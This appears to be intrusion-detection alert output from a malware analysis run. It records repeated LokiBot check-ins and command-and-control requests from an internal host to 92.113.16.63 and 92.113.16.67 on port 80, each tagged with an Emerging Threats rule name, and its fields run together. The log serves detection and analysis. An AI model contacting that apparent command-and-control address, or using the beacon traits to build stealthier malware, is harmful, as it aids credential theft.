                                  2024-12-22T14:12:22.413385+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54972392.113.16.6380TCP
                                  2024-12-22T14:12:23.904363+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54972392.113.16.6380TCP
                                  2024-12-22T14:12:23.904363+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54972392.113.16.6380TCP
                                  2024-12-22T14:12:24.298560+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54973092.113.16.6380TCP
                                  2024-12-22T14:12:24.298560+01002025381ET MALWARE LokiBot Checkin1192.168.2.54973092.113.16.6380TCP
                                  2024-12-22T14:12:24.298560+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54973092.113.16.6380TCP
                                  2024-12-22T14:12:25.864302+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54973092.113.16.6380TCP
                                  2024-12-22T14:12:25.864302+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54973092.113.16.6380TCP
                                  2024-12-22T14:12:26.270738+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54973792.113.16.6380TCP
                                  2024-12-22T14:12:26.270738+01002025381ET MALWARE LokiBot Checkin1192.168.2.54973792.113.16.6380TCP
                                  2024-12-22T14:12:26.270738+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54973792.113.16.6380TCP
                                  2024-12-22T14:12:27.824506+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54973792.113.16.6380TCP
                                  2024-12-22T14:12:27.824506+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54973792.113.16.6380TCP
                                  2024-12-22T14:12:28.206249+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54974492.113.16.6380TCP
                                  2024-12-22T14:12:28.206249+01002025381ET MALWARE LokiBot Checkin1192.168.2.54974492.113.16.6380TCP
                                  2024-12-22T14:12:28.206249+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54974492.113.16.6380TCP
                                  2024-12-22T14:12:29.795605+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54974492.113.16.6380TCP
                                  2024-12-22T14:12:29.795605+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54974492.113.16.6380TCP
                                  2024-12-22T14:12:30.193986+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54975092.113.16.6380TCP
                                  2024-12-22T14:12:30.193986+01002025381ET MALWARE LokiBot Checkin1192.168.2.54975092.113.16.6380TCP
                                  2024-12-22T14:12:30.193986+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54975092.113.16.6380TCP
                                  2024-12-22T14:12:31.769591+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54975092.113.16.6380TCP
                                  2024-12-22T14:12:31.769591+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54975092.113.16.6380TCP
                                  2024-12-22T14:12:32.170808+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54975692.113.16.6380TCP
                                  2024-12-22T14:12:32.170808+01002025381ET MALWARE LokiBot Checkin1192.168.2.54975692.113.16.6380TCP
                                  2024-12-22T14:12:32.170808+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54975692.113.16.6380TCP
                                  2024-12-22T14:12:33.666583+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54975692.113.16.6380TCP
                                  2024-12-22T14:12:33.666583+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54975692.113.16.6380TCP
                                  2024-12-22T14:12:34.048387+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54976292.113.16.6380TCP
                                  2024-12-22T14:12:34.048387+01002025381ET MALWARE LokiBot Checkin1192.168.2.54976292.113.16.6380TCP
                                  2024-12-22T14:12:34.048387+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54976292.113.16.6380TCP
                                  2024-12-22T14:12:35.540017+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54976292.113.16.6380TCP
                                  2024-12-22T14:12:35.540017+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54976292.113.16.6380TCP
                                  2024-12-22T14:12:35.977485+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54976892.113.16.6380TCP
                                  2024-12-22T14:12:35.977485+01002025381ET MALWARE LokiBot Checkin1192.168.2.54976892.113.16.6380TCP
                                  2024-12-22T14:12:35.977485+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54976892.113.16.6380TCP
                                  2024-12-22T14:12:37.539487+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54976892.113.16.6380TCP
                                  2024-12-22T14:12:37.539487+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54976892.113.16.6380TCP
                                  2024-12-22T14:12:37.922549+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54977192.113.16.6380TCP
                                  2024-12-22T14:12:37.922549+01002025381ET MALWARE LokiBot Checkin1192.168.2.54977192.113.16.6380TCP
                                  2024-12-22T14:12:37.922549+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54977192.113.16.6380TCP
                                  2024-12-22T14:12:39.530868+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54977192.113.16.6380TCP
                                  2024-12-22T14:12:39.530868+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54977192.113.16.6380TCP
                                  2024-12-22T14:12:39.913797+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54977492.113.16.6380TCP
                                  2024-12-22T14:12:39.913797+01002025381ET MALWARE LokiBot Checkin1192.168.2.54977492.113.16.6380TCP
                                  2024-12-22T14:12:39.913797+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54977492.113.16.6380TCP
                                  2024-12-22T14:12:41.400417+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54977492.113.16.6380TCP
                                  2024-12-22T14:12:41.400417+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54977492.113.16.6380TCP
                                  2024-12-22T14:12:41.792852+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54977992.113.16.6380TCP
                                  2024-12-22T14:12:41.792852+01002025381ET MALWARE LokiBot Checkin1192.168.2.54977992.113.16.6380TCP
                                  2024-12-22T14:12:41.792852+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54977992.113.16.6380TCP
                                  2024-12-22T14:12:43.380560+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54977992.113.16.6380TCP
                                  2024-12-22T14:12:43.380560+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54977992.113.16.6380TCP
                                  2024-12-22T14:12:43.778745+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54978592.113.16.6380TCP
                                  2024-12-22T14:12:43.778745+01002025381ET MALWARE LokiBot Checkin1192.168.2.54978592.113.16.6380TCP
                                  2024-12-22T14:12:43.778745+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54978592.113.16.6380TCP
                                  2024-12-22T14:12:45.336914+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54978592.113.16.6380TCP
                                  2024-12-22T14:12:45.336914+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54978592.113.16.6380TCP
                                  2024-12-22T14:12:45.725102+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54979192.113.16.6380TCP
                                  2024-12-22T14:12:45.725102+01002025381ET MALWARE LokiBot Checkin1192.168.2.54979192.113.16.6380TCP
                                  2024-12-22T14:12:45.725102+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54979192.113.16.6380TCP
                                  2024-12-22T14:12:47.298735+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54979192.113.16.6380TCP
                                  2024-12-22T14:12:47.298735+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54979192.113.16.6380TCP
                                  2024-12-22T14:12:47.702297+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54979792.113.16.6380TCP
                                  2024-12-22T14:12:47.702297+01002025381ET MALWARE LokiBot Checkin1192.168.2.54979792.113.16.6380TCP
                                  2024-12-22T14:12:47.702297+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54979792.113.16.6380TCP
                                  2024-12-22T14:12:49.264336+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54979792.113.16.6380TCP
                                  2024-12-22T14:12:49.264336+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54979792.113.16.6380TCP
                                  2024-12-22T14:12:49.654095+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54980392.113.16.6380TCP
                                  2024-12-22T14:12:49.654095+01002025381ET MALWARE LokiBot Checkin1192.168.2.54980392.113.16.6380TCP
                                  2024-12-22T14:12:49.654095+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54980392.113.16.6380TCP
                                  2024-12-22T14:12:51.145466+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54980392.113.16.6380TCP
                                  2024-12-22T14:12:51.145466+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54980392.113.16.6380TCP
                                  2024-12-22T14:12:51.781467+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54980892.113.16.6380TCP
                                  2024-12-22T14:12:51.781467+01002025381ET MALWARE LokiBot Checkin1192.168.2.54980892.113.16.6380TCP
                                  2024-12-22T14:12:51.781467+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54980892.113.16.6380TCP
                                  2024-12-22T14:12:53.385422+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54980892.113.16.6380TCP
                                  2024-12-22T14:12:53.385422+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54980892.113.16.6380TCP
                                  2024-12-22T14:12:53.776209+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54981392.113.16.6380TCP
                                  2024-12-22T14:12:53.776209+01002025381ET MALWARE LokiBot Checkin1192.168.2.54981392.113.16.6380TCP
                                  2024-12-22T14:12:53.776209+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54981392.113.16.6380TCP
                                  2024-12-22T14:12:55.346077+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54981392.113.16.6380TCP
                                  2024-12-22T14:12:55.346077+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54981392.113.16.6380TCP
                                  2024-12-22T14:12:55.748800+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54981992.113.16.6380TCP
                                  2024-12-22T14:12:55.748800+01002025381ET MALWARE LokiBot Checkin1192.168.2.54981992.113.16.6380TCP
                                  2024-12-22T14:12:55.748800+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54981992.113.16.6380TCP
                                  2024-12-22T14:12:57.219949+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54981992.113.16.6380TCP
                                  2024-12-22T14:12:57.219949+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54981992.113.16.6380TCP
                                  2024-12-22T14:12:57.639002+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54982592.113.16.6380TCP
                                  2024-12-22T14:12:57.639002+01002025381ET MALWARE LokiBot Checkin1192.168.2.54982592.113.16.6380TCP
                                  2024-12-22T14:12:57.639002+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54982592.113.16.6380TCP
                                  2024-12-22T14:12:59.252987+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54982592.113.16.6380TCP
                                  2024-12-22T14:12:59.252987+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54982592.113.16.6380TCP
                                  2024-12-22T14:12:59.653024+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54982892.113.16.6380TCP
                                  2024-12-22T14:12:59.653024+01002025381ET MALWARE LokiBot Checkin1192.168.2.54982892.113.16.6380TCP
                                  2024-12-22T14:12:59.653024+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54982892.113.16.6380TCP
                                  2024-12-22T14:13:01.214492+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54982892.113.16.6380TCP
                                  2024-12-22T14:13:01.214492+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54982892.113.16.6380TCP
                                  2024-12-22T14:13:01.607262+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54983492.113.16.6380TCP
                                  2024-12-22T14:13:01.607262+01002025381ET MALWARE LokiBot Checkin1192.168.2.54983492.113.16.6380TCP
                                  2024-12-22T14:13:01.607262+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54983492.113.16.6380TCP
                                  2024-12-22T14:13:03.081093+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54983492.113.16.6380TCP
                                  2024-12-22T14:13:03.081093+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54983492.113.16.6380TCP
                                  2024-12-22T14:13:03.485305+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54984192.113.16.6380TCP
                                  2024-12-22T14:13:03.485305+01002025381ET MALWARE LokiBot Checkin1192.168.2.54984192.113.16.6380TCP
                                  2024-12-22T14:13:03.485305+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54984192.113.16.6380TCP
                                  2024-12-22T14:13:05.050729+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54984192.113.16.6380TCP
                                  2024-12-22T14:13:05.050729+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54984192.113.16.6380TCP
                                  2024-12-22T14:13:05.648440+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54984792.113.16.6380TCP
                                  2024-12-22T14:13:05.648440+01002025381ET MALWARE LokiBot Checkin1192.168.2.54984792.113.16.6380TCP
                                  2024-12-22T14:13:05.648440+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54984792.113.16.6380TCP
                                  2024-12-22T14:13:07.230683+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54984792.113.16.6380TCP
                                  2024-12-22T14:13:07.230683+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54984792.113.16.6380TCP
                                  2024-12-22T14:13:07.852654+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54985392.113.16.6780TCP
                                  2024-12-22T14:13:07.852654+01002025381ET MALWARE LokiBot Checkin1192.168.2.54985392.113.16.6780TCP
                                  2024-12-22T14:13:07.852654+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54985392.113.16.6780TCP
                                  2024-12-22T14:13:09.430877+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54985392.113.16.6780TCP
                                  2024-12-22T14:13:09.430877+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54985392.113.16.6780TCP
                                  2024-12-22T14:13:09.825571+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54985992.113.16.6780TCP
                                  2024-12-22T14:13:09.825571+01002025381ET MALWARE LokiBot Checkin1192.168.2.54985992.113.16.6780TCP
                                  2024-12-22T14:13:09.825571+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54985992.113.16.6780TCP
                                  2024-12-22T14:13:11.446115+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54985992.113.16.6780TCP
                                  2024-12-22T14:13:11.446115+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54985992.113.16.6780TCP
                                  2024-12-22T14:13:11.829832+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54986492.113.16.6780TCP
                                  2024-12-22T14:13:11.829832+01002025381ET MALWARE LokiBot Checkin1192.168.2.54986492.113.16.6780TCP
                                  2024-12-22T14:13:11.829832+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54986492.113.16.6780TCP
                                  2024-12-22T14:13:13.345038+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54986492.113.16.6780TCP
                                  2024-12-22T14:13:13.345038+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54986492.113.16.6780TCP
                                  2024-12-22T14:13:13.746542+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54987092.113.16.6780TCP
                                  2024-12-22T14:13:13.746542+01002025381ET MALWARE LokiBot Checkin1192.168.2.54987092.113.16.6780TCP
                                  2024-12-22T14:13:13.746542+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54987092.113.16.6780TCP
                                  2024-12-22T14:13:15.306696+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54987092.113.16.6780TCP
                                  2024-12-22T14:13:15.306696+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54987092.113.16.6780TCP
                                  2024-12-22T14:13:15.701197+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54987592.113.16.6780TCP
                                  2024-12-22T14:13:15.701197+01002025381ET MALWARE LokiBot Checkin1192.168.2.54987592.113.16.6780TCP
                                  2024-12-22T14:13:15.701197+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54987592.113.16.6780TCP
                                  2024-12-22T14:13:17.174002+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54987592.113.16.6780TCP
                                  2024-12-22T14:13:17.174002+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54987592.113.16.6780TCP
                                  2024-12-22T14:13:17.691250+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54987992.113.16.6780TCP
                                  2024-12-22T14:13:17.691250+01002025381ET MALWARE LokiBot Checkin1192.168.2.54987992.113.16.6780TCP
                                  2024-12-22T14:13:17.691250+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54987992.113.16.6780TCP
                                  2024-12-22T14:13:19.186341+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54987992.113.16.6780TCP
                                  2024-12-22T14:13:19.186341+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54987992.113.16.6780TCP
                                  2024-12-22T14:13:19.580922+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54988592.113.16.6780TCP
                                  2024-12-22T14:13:19.580922+01002025381ET MALWARE LokiBot Checkin1192.168.2.54988592.113.16.6780TCP
                                  2024-12-22T14:13:19.580922+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54988592.113.16.6780TCP
                                  2024-12-22T14:13:21.159824+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54988592.113.16.6780TCP
                                  2024-12-22T14:13:21.159824+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54988592.113.16.6780TCP
                                  2024-12-22T14:13:21.563411+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54988992.113.16.6780TCP
                                  2024-12-22T14:13:21.563411+01002025381ET MALWARE LokiBot Checkin1192.168.2.54988992.113.16.6780TCP
                                  2024-12-22T14:13:21.563411+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54988992.113.16.6780TCP
                                  2024-12-22T14:13:23.045578+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54988992.113.16.6780TCP
                                  2024-12-22T14:13:23.045578+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54988992.113.16.6780TCP
                                  2024-12-22T14:13:23.430650+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54989592.113.16.6780TCP
                                  2024-12-22T14:13:23.430650+01002025381ET MALWARE LokiBot Checkin1192.168.2.54989592.113.16.6780TCP
                                  2024-12-22T14:13:23.430650+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54989592.113.16.6780TCP
                                  2024-12-22T14:13:25.017097+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54989592.113.16.6780TCP
                                  2024-12-22T14:13:25.017097+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54989592.113.16.6780TCP
                                  2024-12-22T14:13:25.406832+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54990192.113.16.6780TCP
                                  2024-12-22T14:13:25.406832+01002025381ET MALWARE LokiBot Checkin1192.168.2.54990192.113.16.6780TCP
                                  2024-12-22T14:13:25.406832+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54990192.113.16.6780TCP
                                  2024-12-22T14:13:27.012094+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54990192.113.16.6780TCP
                                  2024-12-22T14:13:27.012094+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54990192.113.16.6780TCP
                                  2024-12-22T14:13:27.394770+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54990792.113.16.6780TCP
                                  2024-12-22T14:13:27.394770+01002025381ET MALWARE LokiBot Checkin1192.168.2.54990792.113.16.6780TCP
                                  2024-12-22T14:13:27.394770+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54990792.113.16.6780TCP
                                  2024-12-22T14:13:28.961341+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54990792.113.16.6780TCP
                                  2024-12-22T14:13:28.961341+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54990792.113.16.6780TCP
                                  2024-12-22T14:13:29.361059+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54991392.113.16.6780TCP
                                  2024-12-22T14:13:29.361059+01002025381ET MALWARE LokiBot Checkin1192.168.2.54991392.113.16.6780TCP
                                  2024-12-22T14:13:29.361059+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54991392.113.16.6780TCP
                                  2024-12-22T14:13:30.980596+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54991392.113.16.6780TCP
                                  2024-12-22T14:13:30.980596+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54991392.113.16.6780TCP
                                  2024-12-22T14:13:31.366487+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54991992.113.16.6780TCP
                                  2024-12-22T14:13:31.366487+01002025381ET MALWARE LokiBot Checkin1192.168.2.54991992.113.16.6780TCP
                                  2024-12-22T14:13:31.366487+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54991992.113.16.6780TCP
                                  2024-12-22T14:13:32.953227+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54991992.113.16.6780TCP
                                  2024-12-22T14:13:32.953227+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54991992.113.16.6780TCP
                                  2024-12-22T14:13:33.340412+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54992592.113.16.6780TCP
                                  2024-12-22T14:13:33.340412+01002025381ET MALWARE LokiBot Checkin1192.168.2.54992592.113.16.6780TCP
                                  2024-12-22T14:13:33.340412+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54992592.113.16.6780TCP
                                  2024-12-22T14:13:34.840080+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54992592.113.16.6780TCP
                                  2024-12-22T14:13:34.840080+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54992592.113.16.6780TCP
                                  2024-12-22T14:13:35.225031+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54993092.113.16.6780TCP
                                  2024-12-22T14:13:35.225031+01002025381ET MALWARE LokiBot Checkin1192.168.2.54993092.113.16.6780TCP
                                  2024-12-22T14:13:35.225031+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54993092.113.16.6780TCP
                                  2024-12-22T14:13:36.786857+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54993092.113.16.6780TCP
                                  2024-12-22T14:13:36.786857+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54993092.113.16.6780TCP
                                  2024-12-22T14:13:37.184150+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54993492.113.16.6780TCP
                                  2024-12-22T14:13:37.184150+01002025381ET MALWARE LokiBot Checkin1192.168.2.54993492.113.16.6780TCP
                                  2024-12-22T14:13:37.184150+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54993492.113.16.6780TCP
                                  2024-12-22T14:13:38.783948+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54993492.113.16.6780TCP
                                  2024-12-22T14:13:38.783948+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54993492.113.16.6780TCP
                                  2024-12-22T14:13:39.191137+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54994092.113.16.6780TCP
                                  2024-12-22T14:13:39.191137+01002025381ET MALWARE LokiBot Checkin1192.168.2.54994092.113.16.6780TCP
                                  2024-12-22T14:13:39.191137+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54994092.113.16.6780TCP
                                  2024-12-22T14:13:40.664036+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54994092.113.16.6780TCP
                                  2024-12-22T14:13:40.664036+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54994092.113.16.6780TCP
                                  2024-12-22T14:13:41.217229+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54994492.113.16.6780TCP
                                  2024-12-22T14:13:41.217229+01002025381ET MALWARE LokiBot Checkin1192.168.2.54994492.113.16.6780TCP
                                  2024-12-22T14:13:41.217229+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54994492.113.16.6780TCP
                                  2024-12-22T14:13:42.776806+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54994492.113.16.6780TCP
                                  2024-12-22T14:13:42.776806+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54994492.113.16.6780TCP
                                  2024-12-22T14:13:43.173669+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54995092.113.16.6780TCP
                                  2024-12-22T14:13:43.173669+01002025381ET MALWARE LokiBot Checkin1192.168.2.54995092.113.16.6780TCP
                                  2024-12-22T14:13:43.173669+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54995092.113.16.6780TCP
                                  2024-12-22T14:13:44.748036+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54995092.113.16.6780TCP
                                  2024-12-22T14:13:44.748036+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54995092.113.16.6780TCP
                                  2024-12-22T14:13:45.134599+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54995592.113.16.6780TCP
                                  2024-12-22T14:13:45.134599+01002025381ET MALWARE LokiBot Checkin1192.168.2.54995592.113.16.6780TCP
                                  2024-12-22T14:13:45.134599+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54995592.113.16.6780TCP
                                  2024-12-22T14:13:46.742499+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54995592.113.16.6780TCP
                                  2024-12-22T14:13:46.742499+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54995592.113.16.6780TCP
                                  2024-12-22T14:13:47.131865+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54995992.113.16.6780TCP
                                  2024-12-22T14:13:47.131865+01002025381ET MALWARE LokiBot Checkin1192.168.2.54995992.113.16.6780TCP
                                  2024-12-22T14:13:47.131865+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54995992.113.16.6780TCP
                                  2024-12-22T14:13:48.702998+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54995992.113.16.6780TCP
                                  2024-12-22T14:13:48.702998+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54995992.113.16.6780TCP
                                  2024-12-22T14:13:49.082293+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54996492.113.16.6780TCP
                                  2024-12-22T14:13:49.082293+01002025381ET MALWARE LokiBot Checkin1192.168.2.54996492.113.16.6780TCP
                                  2024-12-22T14:13:49.082293+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54996492.113.16.6780TCP
                                  2024-12-22T14:13:50.576775+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54996492.113.16.6780TCP
                                  2024-12-22T14:13:50.576775+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54996492.113.16.6780TCP
                                  2024-12-22T14:13:50.975180+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54997092.113.16.6780TCP
                                  2024-12-22T14:13:50.975180+01002025381ET MALWARE LokiBot Checkin1192.168.2.54997092.113.16.6780TCP
